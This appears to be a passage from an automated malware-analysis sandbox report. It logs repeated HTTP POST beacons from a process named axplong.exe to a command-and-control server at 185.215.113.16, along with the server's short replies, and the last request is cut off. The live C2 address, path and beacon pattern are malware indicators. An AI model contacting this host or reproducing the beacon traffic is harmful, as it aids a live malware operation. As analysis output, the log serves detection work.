                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:44.634176016 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.449774185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:44.741858959 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:45.437916040 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:45.438915968 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:45.663281918 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.449775185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:45.776149988 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:46.512237072 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:46.512996912 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:46.749811888 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.449776185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:46.867578030 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:47.562932014 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:47.564677954 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:47.787681103 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.449777185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:47.897897005 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:48.605828047 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:48.606791973 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:48.841041088 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.449778185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:48.960648060 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:49.663690090 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:49.664798975 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:49.893507957 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  42192.168.2.449779185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:50.007236958 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:50.721996069 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:50.722929001 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:50.950113058 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  43192.168.2.449780185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:51.073642969 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:51.783442974 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:51.789798975 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:52.022228003 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  44192.168.2.449781185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:52.362632036 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:53.051939964 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:53.053421021 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:53.279089928 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  45192.168.2.449782185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:53.398593903 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:54.116070032 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:54.120922089 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:54.350178003 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  46192.168.2.449783185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:54.488132000 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:55.186835051 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:55.188698053 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:55.412720919 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  47192.168.2.449784185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:55.522983074 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:56.213176966 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:56.214174986 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:56.437378883 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  48192.168.2.449785185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:56.556488991 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:57.289028883 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:57.289908886 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
